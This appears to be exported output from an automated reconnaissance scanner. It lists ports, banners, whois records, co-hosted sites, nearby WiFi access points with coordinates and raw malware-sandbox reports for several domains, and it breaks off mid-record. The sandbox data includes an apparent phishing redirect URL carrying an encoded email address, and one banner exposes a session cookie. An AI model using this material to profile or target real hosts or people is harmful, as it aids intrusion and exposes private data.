| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:32:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.15:8443 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/jonas.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.99): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:27 | Raw Data from RIRs | No | URLScan.io | 0 | 0 | 1 | 0 | None | [{u'sort': [1674665560412, u'ef04bede-91fb-48d6-84cd-c81b2eb86237'], u'task': {u'domain': u'ayhu.xyz', u'uuid': u'ef04bede-91fb-48d6-84cd-c81b2eb86237', u'url': u'http://ayhu.xyz/', u'visibility': u'public', u'time': u'2023-01-25T16:52:40.412Z', u'apexDomain': u'ayhu.xyz', u'method': u'manual'}, u'stats': {u'uniqIPs': 2, u'uniqCountries': 1, u'encodedDataLength': 206318, u'requests': 16, u'dataLength': 349476}, u'screenshot': u'https://urlscan.io/screenshots/ef04bede-91fb-48d6-84cd-c81b2eb86237.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/ef04bede-91fb-48d6-84cd-c81b2eb86237/', u'_id': u'ef04bede-91fb-48d6-84cd-c81b2eb86237', u'page': {u'mimeType': u'text/html', u'status': u'503', u'domain': u'ayhu.xyz', u'title': u'Just a moment...', u'url': u'https://ayhu.xyz/', u'ip': u'2a06:98c1:3121::c', u'tlsValidFrom': u'2022-12-14T04:12:07.000Z', u'asnname': u'CLOUDFLARENET, US', u'server': u'cloudflare', u'tlsIssuer': u'GTS CA 1P5', u'tlsValidDays': 89, u'country': u'US', u'redirected': u'https-only', u'apexDomain': u'ayhu.xyz', u'tlsAgeDays': 42, u'asn': u'AS13335'}}] | ayhu.xyz |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.104): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BGINET (Net ID: 00:00:C5:D7:41:64) | 34.0544, -118.244 |
| 2023-05-12 02:58:49 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://jsv3.recruitics.com/redirect?rx_cid=3394&rx_jobId=22014906&rx_url=https%3A%2F%2Fkeen-queijadas-051918.netlify.app%2F%3Fdir%3DZG5ld2VsbEBleHRyZW1lbmV0d29ya3MuY29t', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "ocsp.pki.goog"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_d40_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d40_IE_EarlyTabStart_0xc28_Mutex"\n "IsoScope_d40_IESQMMUTEX_0_519"\n "IsoScope_d40_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d40_ConnHashTable<3392>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3392"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3392"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.192.64.185:443"\n "13.249.139.214:80"\n "65.8.55.18:80"\n "65.8.55.48:80"\n "65.8.55.159:80"\n "34.74.170.74:443"\n "54.230.18.32:443"\n "142.251.211.227:443"\n "172.217.14.202:443"\n "142.251.211.227:80"\n "142.251.215.227:443"\n "3.5.224.150:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "EL1FQVV9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EL1FQVV9.txt]- [targetUID: 00000000-00003392]\n Dropped file: "NPR05TX9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NPR05TX9.txt]- [targetUID: 00000000-00003392]\n Dropped file: "LU3J5Z5Y.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LU3J5Z5Y.txt]- [targetUID: 00000000-00003452]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "www.recaptcha_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "7D6243C18F0F8F9AEC6638DD210F1984_C4E912EA1CF7478AEFF10983696CE52E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D6243C18F0F8F9AEC6638DD210F1984_C4E912EA1CF7478AEFF10983696CE52E]- [targetUID: 00000000-00003452]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003392]\n "A9P3THGH.htm" has type "HTML document UTF-8 Unicode text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0CH0OVJV\\A9P3THGH.htm]- [targetUID: 00000000-00003452]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003452]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003452]\n "EL1FQVV9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EL1FQVV9.txt]- [targetUID: 00000000-00003392]\n "favicon_6_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "E87CE99F124623F95572A696C80EFCAF_48A0517CBEDC34E374472FB21AABC8A8" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E87CE99F124623F95572A696C80EFCAF_48A0517CBEDC34E374472FB21AABC8A8]- [targetUID: 00000000-00003452]\n "bframe_3_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003392]\n "_B14BACFC-3E6D-11ED-9448-08002726DE25_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "NPR05TX9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NPR05TX9.txt]- [targetUID: 00000000-00003392]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003452]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00003452]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://jsv3.recruitics.com/redirect?rx_cid=3394&rx_jobId=22014906&rx_url=https%3A%2F%2Fkeen-queijadas-051918.netlify.app%2F%3Fdir%3DZG5ld2VsbEBleHRyZW1lbmV0d29ya3MuY29t"\n Pattern match: "https://jsv3.recruitics.com"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Heuristic match: "ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEAcWfhO7yUD4HiZydfoHjso%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEASVeeR7RvTclo39SniAB8E%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"'}], u'threat_level': 0, u'size': None, u'job_id': u'63331f1830e7574737082cf9', u'target_url': None, u'i | 34.74.170.74 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pancakes (Net ID: 00:00:48:67:6D:D1) | 37.7813933,-122.3918002 |
| 2023-05-12 03:11:18 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Amsterdam, North Holland, 1012, Netherlands, Europe | 188.114.97.1 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00nave198.github.io | 185.199.111.153 |
| 2023-05-12 02:46:40 | Malicious IP Address | Yes | Fraudguard | 0 | 1 | 2 | 0 | None | abuse_tracker (risk level: 4) [185.199.109.153] | 185.199.109.153 |
| 2023-05-12 02:45:52 | Physical Location | No | AbstractAPI | 0 | 0 | 4 | 0 | None | Montreal, Quebec, H4X, United States, North America | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:03:16 | Co-Hosted Site - Domain Name | No | DNS Resolver | 1 | 0 | 2 | 0 | None | nom-nom.link | funny-face-pictures.nom-nom.link |
| 2023-05-12 02:54:16 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://oldfluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: cprelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: cpsession=%3aQkwdhfWxmK8h0n7J%2c873f8738210af1095901a669c6d9b2d7; HttpOnly; path=/; port=2083; secure
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2083; secure
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12472
| 87.248.157.102 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.209): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | inaturalist (Category: hobby)
https://inaturalist.nz/people/login | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan22 (Net ID: 00:02:6F:04:8F:03) | 37.7642, -122.3993 |
| 2023-05-12 02:54:57 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3120::1:80 | 2a06:98c1:3120::1 |
| 2023-05-12 02:54:23 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 02:46:27 | Netblock Membership | No | RIPE | 2 | 0 | 2 | 0 | None | 172.67.128.0/20 | 172.67.135.9 |
| 2023-05-12 02:59:47 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 3 | 0 | None | Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2015-10-20T06:46:53Z
Creation Date: 2009-02-17T22:08:05Z
Registry Expiry Date: 2024-02-17T22:08:05Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARE.NET
Name Server: NS2.CLOUDFLARE.NET
Name Server: NS3.CLOUDFLARE.NET
Name Server: NS4.CLOUDFLARE.NET
Name Server: NS5.CLOUDFLARE.NET
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 90F710A107DA51ED78125D30A68704CF3C0308AFD01BFCD7057D4BD03B62C68B
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-03-16T19:39:08Z
Creation Date: 2009-02-17T22:08:05Z
Registrar Registration Expiration Date: 2024-02-17T22:08:05Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Name Server: ns1.cloudflare.net
Name Server: ns2.cloudflare.net
Name Server: ns3.cloudflare.net
Name Server: ns4.cloudflare.net
Name Server: ns5.cloudflare.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
| cloudflare.net |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | youpic (Category: hobby)
https://youpic.com/photographer/login | login |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AP Checkpoint (Net ID: 00:02:6F:B8:A2:4E) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:52:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://151.101.131.7/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_aec_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_aec_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_aec_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_aec_IE_EarlyTabStart_0xad4_Mutex"\n "IsoScope_aec_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_aec_ConnHashTable<2796>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2796"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2796"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"151.101.131.7:80"\n "151.101.131.7:443"\n "185.199.108.153:443"\n "74.125.137.155:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"error.ghost.org"\n "query.prod.cms.msn.com"\n "stats.g.doubleclick.net"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found 